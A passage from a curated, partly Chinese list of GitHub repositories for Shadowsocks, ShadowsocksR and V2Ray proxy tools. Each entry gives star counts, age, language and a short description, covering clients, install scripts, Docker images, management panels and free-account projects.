minimum dependencies. - [**24**ๆ˜Ÿ][7m] [Swift] [universonic/shadowsocks-macos](https://github.com/universonic/shadowsocks-macos) Shadowsocks Client for Apple macOS - [**23**ๆ˜Ÿ][4y] [Py] [shadowsocksfork/shadowsocksfork](https://github.com/shadowsocksfork/shadowsocksfork) A fork of shadowsocks 2.8.2 #### <a id="0b7ec49dd41a16ce7ba58d399475e09f"></a>Shadowsocks-ng - [**25815**ๆ˜Ÿ][1m] [Swift] [shadowsocks/shadowsocksx-ng](https://github.com/shadowsocks/shadowsocksx-ng) Next Generation of ShadowsocksX - [**5822**ๆ˜Ÿ][2y] [qinyuhang/shadowsocksx-ng-r](https://github.com/qinyuhang/shadowsocksx-ng-r) Next Generation of ShadowsocksX - [**700**ๆ˜Ÿ][2y] [yichengchen/shadowsocksx-r](https://github.com/yichengchen/shadowsocksx-r) Next Generation of ShadowsocksX - [**141**ๆ˜Ÿ][7m] [JS] [wzdnzd/shadowsocksx-ng-r](https://github.com/wzdnzd/shadowsocksx-ng-r) Shadowsocks Client for MacOS - [**108**ๆ˜Ÿ][13d] [JS] [paradiseduo/shadowsocksx-ng-r8](https://github.com/paradiseduo/shadowsocksx-ng-r8) ShadowsocksX-NG-R for MacOS - [**68**ๆ˜Ÿ][3y] [Py] [yourtion/alfred_shadowsockscontroller](https://github.com/yourtion/alfred_shadowsockscontroller) ShadowsocksX controller for Alfred #### <a id="02a80eb3908819d75933198c6b9c6008"></a>ShadowsocksR - [**5808**ๆ˜Ÿ][2y] [shadowsocksrr/shadowsocksr-android](https://github.com/shadowsocksrr/shadowsocksr-android) A ShadowsocksR client for Android - [**5076**ๆ˜Ÿ][4y] [Py] [shadowsocksr-backup/shadowsocksr](https://github.com/shadowsocksr-backup/shadowsocksr) Python port of ShadowsocksR - [**3940**ๆ˜Ÿ][2y] [C#] [shadowsocksr-backup/shadowsocksr-csharp](https://github.com/shadowsocksr-backup/shadowsocksr-csharp) shadowsocksr C# - [**3826**ๆ˜Ÿ][5y] [shadowsocksr-backup/shadowsocks-rss](https://github.com/shadowsocksr-backup/shadowsocks-rss) ShadowsocksR update rss, SSR organization - [**3420**ๆ˜Ÿ][2y] [shadowsocksrr/shadowsocks-rss](https://github.com/shadowsocksrr/shadowsocks-rss) ShadowsocksR update rss, SSR organization - [**2650**ๆ˜Ÿ][2y] [Py] [shadowsocksrr/shadowsocksr](https://github.com/shadowsocksrr/shadowsocksr) Python port of ShadowsocksR - [**1926**ๆ˜Ÿ][16d] [C#] [hmbsbige/shadowsocksr-windows](https://github.com/hmbsbige/shadowsocksr-windows) ShadowsocksR for Windows - [**1176**ๆ˜Ÿ][7m] [ssrarchive/shadowsocks-rss](https://github.com/ssrarchive/shadowsocks-rss) Shadowsocksr project backup - [**1171**ๆ˜Ÿ][6d] [C] [shadowsocksr-live/shadowsocksr-native](https://github.com/shadowsocksr-live/shadowsocksr-native) ShadowsocksR (SSR) native implementation for all platforms, - [**922**ๆ˜Ÿ][1y] [Shell] [ywb94/openwrt-ssr](https://github.com/ywb94/openwrt-ssr) ShadowsocksR-libev for OpenWrt - [**701**ๆ˜Ÿ][6m] [Py] [mobier/shadowsocksr-speed](https://github.com/mobier/shadowsocksr-speed) SSR ๆ‰น้‡ๆต‹่ฏ•่Š‚็‚นๆœ‰ๆ•ˆๅธฆๅฎฝ - [**665**ๆ˜Ÿ][2y] [shadowsocksr-backup/shadowsocksx-ng](https://github.com/shadowsocksr-backup/shadowsocksx-ng) Next Generation of ShadowsocksX - [**628**ๆ˜Ÿ][2y] [C] [shadowsocksr-backup/shadowsocksr-libev](https://github.com/shadowsocksr-backup/shadowsocksr-libev) libev port of ShadowsocksR - [**478**ๆ˜Ÿ][2y] [Py] [ssrarchive/shadowsocksr](https://github.com/ssrarchive/shadowsocksr) Python port of ShadowsocksR - [**412**ๆ˜Ÿ][2y] [zyfworks/ssr-backup](https://github.com/zyfworks/ssr-backup) ShadowsocksR backups - [**405**ๆ˜Ÿ][2y] [Makefile] [bettermanbao/openwrt-shadowsocksr-libev-full](https://github.com/bettermanbao/openwrt-shadowsocksr-libev-full) ShadowsocksR-libev-full for OpenWrt - [**368**ๆ˜Ÿ][2y] [Py] [shadowsocksr-rm/shadowsocksr](https://github.com/shadowsocksr-rm/shadowsocksr) Python port of ShadowsocksR - [**346**ๆ˜Ÿ][13d] [Py] [qwj/python-proxy](https://github.com/qwj/python-proxy) HTTP/Socks4/Socks5/Shadowsocks/ShadowsocksR/SSH/Redirect/Pf TCP/UDP asynchronous tunnel proxy implemented in Python 3 asyncio. - [**344**ๆ˜Ÿ][1m] [Py] [leitbogioro/ssr.go](https://github.com/leitbogioro/ssr.go) A new shadowsocksR config manager - [**319**ๆ˜Ÿ][5y] [shadowsocksr-rm/shadowsocks-rss](https://github.com/shadowsocksr-rm/shadowsocks-rss) ShadowsocksR update rss, SSR organization - [**238**ๆ˜Ÿ][4m] [Swift] [shadowsocksr-live/ishadowsocksr](https://github.com/shadowsocksr-live/ishadowsocksr) ShadowsocksR for iOS, come from - [**213**ๆ˜Ÿ][2y] [C#] [azure99/shadowsocksrcsm](https://github.com/azure99/shadowsocksrcsm) SSRC#้ญ”ๆ”น็‰ˆ๏ผŒไฟฎๅคๅŽŸ็‰ˆ้“พๆŽฅๅนถ่ฟ›่กŒไบบๆ€งๅŒ–ไฟฎๆ”น - [**212**ๆ˜Ÿ][2y] [Py] [woosoftware/shadowsocksr-origin](https://github.com/woosoftware/shadowsocksr-origin) Python port of ShadowsocksR - [**209**ๆ˜Ÿ][2y] [Go] [sun8911879/shadowsocksr](https://github.com/sun8911879/shadowsocksr) ShadowsocksR(SSR) for Go library - [**190**ๆ˜Ÿ][10m] [JS] [noahziheng/ssr-helper](https://github.com/noahziheng/ssr-helper) A CLI helper of ShadowsocksR Python - [**187**ๆ˜Ÿ][2m] [ObjC] [shadowsocksr-live/ssrmac](https://github.com/shadowsocksr-live/ssrmac) ShadowsocksR (SSR) client for macOS - [**179**ๆ˜Ÿ][2y] [Shell] [malaohu/ssr-with-net-speeder](https://github.com/malaohu/ssr-with-net-speeder) Shadowsocksr with net speeder - [**105**ๆ˜Ÿ][10m] [Py] [ehco1996/shadowsocksr-deprecated](https://github.com/ehco1996/shadowsocksr-deprecated) ssr mod version for django-sspanel - [**100**ๆ˜Ÿ][20d] [Makefile] [honwen/openwrt-shadowsocksr](https://github.com/honwen/openwrt-shadowsocksr) ShadowsocksR-libev for OpenWrt/LEDE - [**90**ๆ˜Ÿ][7m] [Shell] [honwen/luci-app-shadowsocksr](https://github.com/honwen/luci-app-shadowsocksr) OpenWrt/LEDE LuCI for ShadowsocksR-libev - [**82**ๆ˜Ÿ][1y] [JS] [toyodadoubi/ssrstatus](https://github.com/toyodadoubi/ssrstatus) Shadowsocks/ShadowsocksR ่ดฆๅทๅœจ็บฟ็›‘ๆŽง - [**61**ๆ˜Ÿ][2y] [C#] [kuoruan/shadowsocksr-csharp](https://github.com/kuoruan/shadowsocksr-csharp) ShadowsocksR for Windows - [**55**ๆ˜Ÿ][7m] [Py] [shadowsocksr-live/shadowsocksr](https://github.com/shadowsocksr-live/shadowsocksr) - [**50**ๆ˜Ÿ][2m] [Dockerfile] [winterssy/ssr-docker](https://github.com/winterssy/ssr-docker) ไฝฟ็”จDocker้ƒจ็ฝฒShadowsocksRๆœๅŠก็ซฏ - [**31**ๆ˜Ÿ][2y] [shadowsocksrr/shadowsocksx-ng](https://github.com/shadowsocksrr/shadowsocksx-ng) Next Generation of ShadowsocksX - [**30**ๆ˜Ÿ][5m] [starriv/docker-ss](https://github.com/starriv/docker-ss) use the docker to run shadowsocksr - [**27**ๆ˜Ÿ][2y] [Makefile] [shadowsocksr-rm/openwrt-shadowsocksr](https://github.com/shadowsocksr-rm/openwrt-shadowsocksr) ShadowsocksR-libev for OpenWrt/LEDE - [**25**ๆ˜Ÿ][2y] [shadowsocksr-rm/shadowsocksx-ng](https://github.com/shadowsocksr-rm/shadowsocksx-ng) Next Generation of ShadowsocksX - [**14**ๆ˜Ÿ][5d] [C] [shadowsocksr-live/ssrwin](https://github.com/shadowsocksr-live/ssrwin) ShadowsocksR (SSR) client for Windows - [**13**ๆ˜Ÿ][2y] [TS] [kokororin/nssr](https://github.com/kokororin/nssr) Node.js client for ShadowsocksR #### <a id="81bb199d6d8690cc6d7ddc92aa81f7f9"></a>ๅธๅท - [**5654**ๆ˜Ÿ][1m] [Roff] [max2max/freess](https://github.com/max2max/freess) ๅ…่ดนss่ดฆๅท ๅ…่ดนshadowsocks่ดฆๅท ๅ…่ดนv2ray่ดฆๅท (้•ฟๆœŸๆ›ดๆ–ฐ) - [**2437**ๆ˜Ÿ][2m] [Py] [the0demiurge/shadowsocksshare](https://github.com/the0demiurge/shadowsocksshare) ไปŽss(r)ๅ…ฑไบซ็ฝ‘็ซ™็ˆฌ่™ซ่Žทๅ–ๅ…ฑไบซss(r)่ดฆๅท๏ผŒ้€š่ฟ‡่งฃๆžๅนถๆ ก้ชŒ่ดฆๅท่ฟž้€šๆ€ง๏ผŒ้‡ๆ–ฐๅˆ†ๅ‘่ดฆๅทๅนถ็”Ÿๆˆ่ฎข้˜…้“พๆŽฅ - [**475**ๆ˜Ÿ][1y] [itrump/ssfree](https://github.com/itrump/ssfree) provide shadowsocks free tutorial and free account - [**133**ๆ˜Ÿ][2y] [Py] [chenjiandongx/soksaccounts](https://github.com/chenjiandongx/soksaccounts) Shadowsocks ่ดฆๅท็ˆฌ่™ซ #### <a id="bfe4545f8f585c6f19d28ae9d5912aff"></a>ๆ’ไปถ - [**749**ๆ˜Ÿ][7m] [Go] [cbeuw/goquiet](https://github.com/cbeuw/goquiet) A Shadowsocks obfuscation plugin utilising domain fronting to evade deep packet inspection - [**53**ๆ˜Ÿ][2y] [HTML] [jm33-m0/gfw_scripts](https://github.com/jm33-m0/gfw_scripts) added shadowsocks plugin for gee 4 - [**36**ๆ˜Ÿ][1m] [Java] [xausky/shadowsocksgostplugin](https://github.com/xausky/shadowsocksgostplugin) Gost ็š„ Shadowsocks ๅฎ‰ๅ“ๆ’ไปถ๏ผŒๅฏไปฅ็›ดๆŽฅๅœจ Shadowsocks ๅฎ‰ๅ“ๅฎขๆˆท็ซฏไธŠ่ฟžๆŽฅ Gost ๆœๅŠกๅ™จ #### <a id="82476f41454f4e55dcdcf45d817e0395"></a>Docker - [**81**ๆ˜Ÿ][2y] [JS] [chxj1992/shadowsocks-manager-docker](https://github.com/chxj1992/shadowsocks-manager-docker) ่ฟ™ๆ˜ฏไธ€ไธชๅŸบไบŽ shadowsocks-manager webui ๆ’ไปถๅผ€ๅ‘็š„shadowsocks่ดฆๅทๅ”ฎๅ–็ฝ‘็ซ™็š„Docker้•œๅƒ - [**65**ๆ˜Ÿ][9m] [Dockerfile] [hangim/kcp-shadowsocks-docker](https://github.com/hangim/kcp-shadowsocks-docker) A docker image for shadowsocks server with KCPTUN support - [**28**ๆ˜Ÿ][21d] [Shell] [yaleh/kcp-shadowsocks-server](https://github.com/yaleh/kcp-shadowsocks-server) Docker image of a server with KCP tunnel and Shadowsocks. - [**24**ๆ˜Ÿ][4y] [xgfan/ss-relay](https://github.com/xgfan/ss-relay) shadowsocks relay docker - [**22**ๆ˜Ÿ][12m] [Shell] [cogset/shadowsocks](https://github.com/cogset/shadowsocks) Shadowsocks in Docker - [**21**ๆ˜Ÿ][1m] [Dockerfile] [secbone/docker-ss-libev](https://github.com/secbone/docker-ss-libev) A mini docker image of Shadowsocks-libev only 15M in size - [**21**ๆ˜Ÿ][1y] [Dockerfile] [alibo/goquiet-shadowsocks-docker](https://github.com/alibo/goquiet-shadowsocks-docker) A Docker image for Shadowsocks over GoQuiet #### <a id="0a4e6103d8a48ee758983d56018076da"></a>ๅฎ‰่ฃ…&&็ฎก็† - [**7207**ๆ˜Ÿ][7m] [Shell] [teddysun/shadowsocks_install](https://github.com/teddysun/shadowsocks_install) Auto Install Shadowsocks Server for CentOS/Debian/Ubuntu - [**4246**ๆ˜Ÿ][2y] [imeiji/shadowsocks_install](https://github.com/imeiji/shadowsocks_install) Auto install shadowsocks server๏ผŒthanks ็ง‹ๆฐด้€ธๅ†ฐ - [**3860**ๆ˜Ÿ][5d] [JS] [shadowsocks/shadowsocks-manager](https://github.com/shadowsocks/shadowsocks-manager) A shadowsocks manager tool for multi user and traffic control. - [**1660**ๆ˜Ÿ][4d] [Py] [ehco1996/django-sspanel](https://github.com/ehco1996/django-sspanel) ็”จdiangoๅผ€ๅ‘็š„ๅ…จๆ–ฐ็š„shadowsocks็ฝ‘็ปœ้ขๆฟ - [**858**ๆ˜Ÿ][2y] [CoffeeScript] [onplus/shadowsocks-heroku](https://github.com/onplus/shadowsocks-heroku) ไธ€้”ฎ้ƒจ็ฝฒ Free Shadowsocks-Heroku - [**843**ๆ˜Ÿ][3y] [Shell] [hellofwy/ss-bash](https://github.com/hellofwy/ss-bash) Shadowsocksๆต้‡็ฎก็†่„šๆœฌ - [**481**ๆ˜Ÿ][3y] [JS] [vincentchanx/shadowsocks-over-websocket](https://github.com/vincentchanx/shadowsocks-over-websocket) ๅ…่ดนไฝฟ็”จ Heroku ้ƒจ็ฝฒ shadowsocks - [**207**ๆ˜Ÿ][2m] [Py] [edboffical/bsp](https://github.com/edboffical/bsp) shadowsocksๅคš็”จๆˆทใ€ๆต้‡ใ€้™ๆ—ถ็ฎก็†ๆŽฅๅฃ - [**179**ๆ˜Ÿ][4y] [JS] [gamexg/shadowsocks_admin](https://github.com/gamexg/shadowsocks_admin) ไธ€ไธช shadowsocks ๆœๅŠกๅ™จๅคš่ดฆๅท็ฎก็†็ณป็ปŸ๏ผŒๅŽ็ซฏไฝฟ็”จ shadowsocks-go ใ€‚ๆ”ฏๆŒๅคš่Š‚็‚นใ€ๆต้‡้™ๅˆถ็ญ‰ๅŠŸ่ƒฝใ€‚ - [**136**ๆ˜Ÿ][2y] [Shell] [junbaor/shell_script](https://github.com/junbaor/shell_script) ไธ€้”ฎๅฎ‰่ฃ… shadowsocks๏ผŒๆ”ฏๆŒ chacha20-ietf-poly1305 ๅŠ ๅฏ†ๆ–นๅผ - [**107**ๆ˜Ÿ][1y] [Py] [lizhongnian/btpanel-ss](https://github.com/lizhongnian/btpanel-ss) ๅŸบไบŽๅฎๅก”Linux้ขๆฟ็š„shadowsocksๅฏ่ง†ๅŒ–็ฎก็†ๆ’ไปถ,ๆœฌไบบๅšๅฎข,ๆฌข่ฟŽๅคงๅฎถๆŒ‡ๅฏผ - [**54**ๆ˜Ÿ][1y] [PHP] [ahref-group/superpanel](https://github.com/ahref-group/superpanel) A new shadowsocks panel based on ThinkPHP - [**42**ๆ˜Ÿ][2y] [Py] [liang2580/btpanel-ss](https://github.com/liang2580/btpanel-ss) ๅŸบไบŽๅฎๅก”Linux้ขๆฟ็š„shadowsocksๅฏ่ง†ๅŒ–็ฎก็†ๆ’ไปถ - [**40**ๆ˜Ÿ][8d] [HTML] [zkeeer/shadowsocks-manager](https://github.com/zkeeer/shadowsocks-manager) shadowsocksๅคš็”จๆˆท็ฎก็†๏ผŒๅฏ่ง†ๅŒ–็ฎก็†๏ผŒ่ฝป้‡็บง๏ผŒไธ€้”ฎๅฎ‰่ฃ…shadowsocksๅ’Œssadmin๏ผŒๆŽงๅˆถ็ซฏๅฃๆต้‡/้€Ÿๅบฆ๏ผŒๆŸฅ็œ‹็ซฏๅฃ็Šถๆ€๏ผŒไฟฎๆ”นss้…็ฝฎ - [**28**ๆ˜Ÿ][3m] [Shell] [hybtoy/ssrrmu](https://github.com/hybtoy/ssrrmu) ShadowsocksRR (shadowsocksr/ssr) multi-user and single-user install script - [**28**ๆ˜Ÿ][3y] [Shell] [rccoder/awesome-shadowsocks-qt5-installation-on-debian](https://github.com/rccoder/awesome-shadowsocks-qt5-installation-on-debian) Installation Script For shadowsocks-Qt5 on Debian - [**28**ๆ˜Ÿ][2m] [Shell] [idkiro/ssmgr-install](https://github.com/idkiro/ssmgr-install) shadowsocks-manager ๅ‰็ซฏ+ๅŽ็ซฏ+้ญ”ๆ”นBBRไธ€้”ฎ้ƒจ็ฝฒ่„šๆœฌ - [**21**ๆ˜Ÿ][3y] [C#] [shadowsocks-plus/shadowsocks-plus-win](https://github.com/shadowsocks-plus/shadowsocks-plus-win) An installer for SSPlus local proxy on Windows #### <a id="81ba7ad53e5c5f4a9615923ba9595928"></a>ๅ…ถไป– - [**1198**ๆ˜Ÿ][2m] [jadagates/shadowsocksbio](https://github.com/jadagates/shadowsocksbio) ่ฎฐๅฝ•ไธ€ไธ‹SS็š„ๅ‰ไธ–ไปŠ็”Ÿ๏ผŒไปฅๅŠไธ€ไธช็ฎ€ๅ•็š„ๆ•™็จ‹ๆ€ป็ป“ - [**949**ๆ˜Ÿ][3m] [zhaoweih/shadowsocks-tutorial](https://github.com/zhaoweih/shadowsocks-tutorial) SSๆ•™็จ‹ ### <a id="dbc310300d300ae45b04779281fe6ec8"></a>V2Ray #### <a id="9a47326f72e25428c0163118b9eb42e5"></a>ๆœชๅˆ†็ฑป - [**19408**ๆ˜Ÿ][1y] [alvin9999/new-pac](https://github.com/alvin9999/new-pac) ็ง‘ๅญฆ/่‡ช็”ฑไธŠ็ฝ‘๏ผŒๅ…่ดนss/ssr/v2ray/goflyway่ดฆๅท๏ผŒๆญๅปบๆ•™็จ‹ - [**5067**ๆ˜Ÿ][13d] [Swift] [yanue/v2rayu](https://github.com/yanue/v2rayu) V2rayU,ๅŸบไบŽv2rayๆ ธๅฟƒ็š„mac็‰ˆๅฎขๆˆท็ซฏ,็”จไบŽ็ง‘ๅญฆไธŠ็ฝ‘,ไฝฟ็”จswift็ผ–ๅ†™,ๆ”ฏๆŒvmess,shadowsocks,socks5็ญ‰ๆœๅŠกๅ่ฎฎ,ๆ”ฏๆŒ่ฎข้˜…, ๆ”ฏๆŒไบŒ็ปด็ ,ๅ‰ช่ดดๆฟๅฏผๅ…ฅ,ๆ‰‹ๅŠจ้…็ฝฎ,ไบŒ็ปด็ ๅˆ†ไบซ็ญ‰ - [**1789**ๆ˜Ÿ][25d] [selierlin/share-ssr-v2ray](https://github.com/selierlin/share-ssr-v2ray) ่งฃๅ†ณ็ง‘ๅญฆไธŠ็ฝ‘้—ฎ้ข˜ - [**1450**ๆ˜Ÿ][12d] [Go] [xiaoming2028/free-pac](https://github.com/xiaoming2028/Free-PAC) ็ง‘ๅญฆไธŠ็ฝ‘/ๆขฏๅญ/่‡ช็”ฑไธŠ็ฝ‘/็ฟปๅข™ SS/SSR/V2Ray/Brook ๆญๅปบๆ•™็จ‹ - [**1350**ๆ˜Ÿ][1y] [kirikira/vtemplate](https://github.com/kirikira/vtemplate) v2ray็š„ๆจกๆฟไปฌ - [**1188**ๆ˜Ÿ][4d] [Go] [shadowsocks/v2ray-plugin](https://github.com/shadowsocks/v2ray-plugin) A SIP003 plugin based on v2ray - [**983**ๆ˜Ÿ][22d] [HTML] [sprov065/v2-ui](https://github.com/sprov065/v2-ui) ๆ”ฏๆŒๅคšๅ่ฎฎๅคš็”จๆˆท็š„ v2ray ้ขๆฟ๏ผŒSupport multi-protocol multi-user v2ray panel - [**911**ๆ˜Ÿ][4m] [Kotlin] [eycorsican/kitsunebi-android](https://github.com/eycorsican/kitsunebi-android) A fully-featured V2Ray client for Android. - [**835**ๆ˜Ÿ][1m] [Shell] [zfl9/ss-tproxy](https://github.com/zfl9/ss-tproxy) SS/SSR/V2Ray/Socks5 ้€ๆ˜Žไปฃ็† for Linux - [**662**ๆ˜Ÿ][2m] [Shell] [toutyrater/v2ray-guide](https://github.com/toutyrater/v2ray-guide) - [**619**ๆ˜Ÿ][6d] [ntkernel/lantern](https://github.com/ntkernel/lantern) V2Ray้…็ฝฎๆ–‡ไปถ๏ผŒ่“็ฏ(Lantern)็ ด่งฃ๏ผŒๆ‰‹ๆœบ็‰ˆ+win็‰ˆ - [**616**ๆ˜Ÿ][23d] [C++] [lhy0403/qv2ray](https://github.com/lhy0403/qv2ray) v2ray linux Windows macOS GUI, ไฝฟ็”จ Qt & c++๏ผŒ ๆ”ฏๆŒ vmess ss socks๏ผŒๆ”ฏๆŒ vmess:// ๆ‰ซๆไบŒ็ปด็ ๏ผŒ่ทฏ็”ฑ็ผ–่พ‘ - [**460**ๆ˜Ÿ][2y] [Kotlin] [v2ray-android/actinium](https://github.com/v2ray-android/actinium) A 3rd party V2Ray client for Android - [**454**ๆ˜Ÿ][28d] [Py] [jiangxufeng/v2rayl](https://github.com/jiangxufeng/v2rayl) v2ray linux GUIๅฎขๆˆท็ซฏ๏ผŒๆ”ฏๆŒ่ฎข้˜…ใ€vemssใ€ss็ญ‰ๅ่ฎฎ๏ผŒ่‡ชๅŠจๆ›ดๆ–ฐ่ฎข้˜…ใ€ๆฃ€ๆŸฅ็‰ˆๆœฌๆ›ดๆ–ฐ - [**421**ๆ˜Ÿ][1y] [Py] [veekxt/v2ray-template](https://github.com/veekxt/v2ray-template) v2ray ๆจกๆฟ๏ผŒv2ray ้…็ฝฎ็”Ÿๆˆๅทฅๅ…ท - [**369**ๆ˜Ÿ][3m] [Dockerfile] [onplus/v2hero](https://github.com/onplus/v2hero) All Free . Deploy V2Ray to Heroku . v2rayๅญฆไน ๅ‚่€ƒ - [**346**ๆ˜Ÿ][1y] [Shell] [dylanbai8/onekey_caddy_php7_sqlite3](https://github.com/dylanbai8/onekey_caddy_php7_sqlite3) ๅฐๅ†…ๅญ˜ VPS ไธ€้”ฎๆญๅปบ Caddy+PHP7+Sqlite3 ็Žฏๅขƒ ๏ผˆๆ”ฏๆŒVPSๆœ€ๅฐๅ†…ๅญ˜64M๏ผ‰๏ผŒไธ€้”ฎ็ฟปๅข™ caddy+web(php+sqlite3)+v2ray+bbrใ€‚ - [**314**ๆ˜Ÿ][3m] [Shell] [zw963/asuswrt-merlin-transparent-proxy](https://github.com/zw963/asuswrt-merlin-transparent-proxy) transparent proxy base on ss, v2ray, ipset, iptables, chinadns on asuswrt merlin. - [**283**ๆ˜Ÿ][29d] [Dockerfile] [pengchujin/v2raydocker](https://github.com/pengchujin/v2raydocker) ไธ€้”ฎv2ray ws + tls ๆ–นไพฟๅฐฑๅฎŒไบ‹ไบ† - [**254**ๆ˜Ÿ][3m] [Shell] [sprov065/sprov-ui](https://github.com/sprov065/sprov-ui) ไธ€ไธชๆ”ฏๆŒๅคšๅ่ฎฎๅคš็”จๆˆท็š„v2ray Web้ขๆฟ - [**246**ๆ˜Ÿ][1y] [Shell] [dylanbai8/v2ray_h2-tls_website_onekey](https://github.com/dylanbai8/v2ray_h2-tls_website_onekey) V2RAY ๅŸบไบŽ CADDY ็š„ VMESS+H2+TLS+Website(Use Host)+Rinetd BBR ไธ€้”ฎๅฎ‰่ฃ…่„šๆœฌ - [**203**ๆ˜Ÿ][21d] [Lua] [kuoruan/luci-app-v2ray](https://github.com/kuoruan/luci-app-v2ray) LuCI support for V2Ray - [**165**ๆ˜Ÿ][2y] [Shell] [moexin/easy-v2ray](https://github.com/moexin/easy-v2ray) ็ฎ€ๅ•็š„V2rayไธ€้”ฎ้…็ฝฎๅŒ…๏ผŒๅฐ็™ฝไนŸ่ƒฝ็ฎ€ๅ•ไธŠๆ‰‹ใ€‚ - [**165**ๆ˜Ÿ][4d] [JS] [paperseller/chn-iplist](https://github.com/paperseller/chn-iplist) Chnroutes rules for routersใ€Shadowrocketใ€Quantumultใ€Kitsunebiใ€aclใ€BifrostVใ€v2rayNGใ€clashใ€pacใ€v2ray config file. - [**154**ๆ˜Ÿ][10m] [Shell] [v2ray/dist](https://github.com/v2ray/dist) Mirror of V2Ray core releases - [**132**ๆ˜Ÿ][9m] [JS] [htfy96/v2ray-config-gen](https://github.com/htfy96/v2ray-config-gen) V2Ray Configuration generator - [**129**ๆ˜Ÿ][2y] [C#] [v2ray/v2ray-panel-master](https://github.com/v2ray/v2ray-panel-master) Deprecated - [**112**ๆ˜Ÿ][6m] [v2rayv3/v2ray-sspanel-v3-mod_uim-plugin](https://github.com/v2rayv3/v2ray-sspanel-v3-mod_uim-plugin) - [**98**ๆ˜Ÿ][1m] [Go] [ne1llee/v2ray2clash](https://github.com/ne1llee/v2ray2clash) V2rayใ€SSR subscribe convert to Clashใ€QuantumultX - [**96**ๆ˜Ÿ][5d] [Go] [colettecontreras/v2ray-poseidon](https://github.com/ColetteContreras/v2ray-poseidon) A buildin V2ray plugin for SSRPanel to sync users from database to v2ray, to log traffics/system info - [**86**ๆ˜Ÿ][9m] [Py] [npist/v2rayms](https://github.com/npist/v2rayms) v2ray whmcs ๅคš็”จๆˆทๅŽ็ซฏ - [**79**ๆ˜Ÿ][2y] [nanqinlang-mogic/v2ray](https://github.com/nanqinlang-mogic/v2ray) template with websocket+tls+nginx of v2ray - [**77**ๆ˜Ÿ][2m] [Py] [boypt/vmess2json](https://github.com/boypt/vmess2json) Scripts parse vmess:// links into v2ray config json and vice versa. - [**58**ๆ˜Ÿ][3y] [v2ray/planning](https://github.com/v2ray/planning) Deprecated. Please use v2ray-core for feature requests - [**57**ๆ˜Ÿ][10m] [Vue] [pengchujin/subscribevue](https://github.com/pengchujin/subscribevue) ss ssr v2ray ่ฎข้˜…็ฎก็† vueๅ‰็ซฏ็•Œ้ข - [**57**ๆ˜Ÿ][10m] [TS] [pengchujin/onesubscribe](https://github.com/pengchujin/onesubscribe) ss ssr v2ray ่ฎข้˜…็ฎก็† node ๅŽ็ซฏ - [**56**ๆ˜Ÿ][2y] [Kotlin] [v2ray/v2rayng](https://github.com/v2ray/v2rayng) This project is currently discontinued. Please use this code with care and considering adopt it. - [**52**ๆ˜Ÿ][2m] [Shell] [mwz1tn/free-v2ray](https://github.com/mwz1tn/free-v2ray) ๅ…่ดนv2rayๅˆ†ไบซ๏ผŒV2rayๅฎ‰่ฃ…ไฝฟ็”จๆ•™็จ‹๏ผŒๅข™่ฃ‚็š„่ดญไนฐไฝฟ็”จๆ•™็จ‹ - [**48**ๆ˜Ÿ][2y] [Shell] [danielfree/asus-v2ray-transparent-proxy](https://github.com/danielfree/asus-v2ray-transparent-proxy) transparent proxy with v2ray, iptables, ipset ๆ— ็บฟ่ทฏ็”ฑๅ™จ v2ray ้€ๆ˜Žไปฃ็† - [**46**ๆ˜Ÿ][2y] [Go] [onplus/v2ray-sitedat](https://github.com/onplus/v2ray-sitedat) - [**42**ๆ˜Ÿ][9d] [Go] [mzz2017/v2raya](https://github.com/mzz2017/v2raya) V2RayAๆ˜ฏไธ€ไธชๆ”ฏๆŒๅ…จๅฑ€้€ๆ˜Žไปฃ็†็š„V2Ray Linux GUIๅฎขๆˆท็ซฏใ€‚ - [**41**ๆ˜Ÿ][1y] [Py] [v2ray/v2ray-shell_alpha](https://github.com/v2ray/v2ray-shell_alpha) A GUI for V2Ray-core, written in PyQt5 - [**38**ๆ˜Ÿ][3m] [C++] [aliyuchang33/hv2ray](https://github.com/aliyuchang33/hv2ray) A linux GUI tool for v2ray base on QT. - [**33**ๆ˜Ÿ][2y] [C#] [mili-tan/mv2rayconfig](https://github.com/mili-tan/mv2rayconfig) - [**32**ๆ˜Ÿ][3m] [Shell] [lbp0200/v2ray-vultr](https://github.com/lbp0200/v2ray-vultr) ๅœจvultrไธŠ๏ผŒๅœจ็บฟ่‡ชๅŠจ้ƒจ็ฝฒv2ray - [**31**ๆ˜Ÿ][2m] [Shell] [masssmith/smgate](https://github.com/masssmith/smgate) ็”จๆ ‘่Ž“ๆดพๅšv2ray้€ๆ˜Ž็ฟปๅข™็ฝ‘ๅ…ณ - [**31**ๆ˜Ÿ][1y] [Shell] [wongsyrone/openwrt-v2ray](https://github.com/wongsyrone/openwrt-v2ray) v2ray package example for OpenWrt/LEDE - [**31**ๆ˜Ÿ][2m] [xuxiaodong/v2ray-for-ansible](https://github.com/xuxiaodong/v2ray-for-ansible) V2Ray for Ansible - [**27**ๆ˜Ÿ][2y] [JS] [kafuuchinoq/v2raygeokit](https://github.com/kafuuchinoq/v2raygeokit) - [**26**ๆ˜Ÿ][6m] [Batchfile] [dylanbai8/c2ray](https://github.com/dylanbai8/c2ray) C2ray ไธ€ๆฌพwindowsไธ‹็š„ๆž็ฎ€ V2ray ๅฎขๆˆท็ซฏ - [**25**ๆ˜Ÿ][2y] [C#] [zjyl1994/v2switcher](https://github.com/zjyl1994/v2switcher) ๆž็ฎ€V2Ray้…็ฝฎๅˆ‡ๆขๅ™จ๏ผŒๆ‹ฏๆ•‘ๅคš็บฟ็”จๆˆท - [**24**ๆ˜Ÿ][24d] [JS] [josephpei/uv2ray](https://github.com/josephpei/uv2ray) Electron V2ray Client (mostly for Linux) - [**22**ๆ˜Ÿ][1y] [Shell] [sparkness/v2ray-tls-docker](https://github.com/sparkness/v2ray-tls-docker) easy to use v2ray tls server - [**20**ๆ˜Ÿ][1y] [Shell] [kyonli/asuswrt-v2ray](https://github.com/kyonli/asuswrt-v2ray) Transparent proxy based on V2Ray - [**19**ๆ˜Ÿ][2m] [Go] [ehco1996/v2scar](https://github.com/ehco1996/v2scar) sidecar for V2ray - [**19**ๆ˜Ÿ][5d] [Shell] [mack-a/v2ray-agent](https://github.com/mack-a/v2ray-agent) ๆœฌ้กน็›ฎๆ—จๅœจๆ›ดๅฅฝ็š„ๅญฆไน ๆ–ฐ็Ÿฅ่ฏ†๏ผŒ้‡‡็”จCDN+TLS+Nginx+v2ray่ฟ›่กŒไผช่ฃ…ๅนถ็ช็ ด้˜ฒ็ซๅข™ใ€‚ - [**16**ๆ˜Ÿ][2y] [Ruby] [kofj/homebrew-v2ray](https://github.com/kofj/homebrew-v2ray) Homebrew tap for v2ray core. #### <a id="441d09c37d758425d97bcdb5e08a4256"></a>V2Ray-lib/GUI - 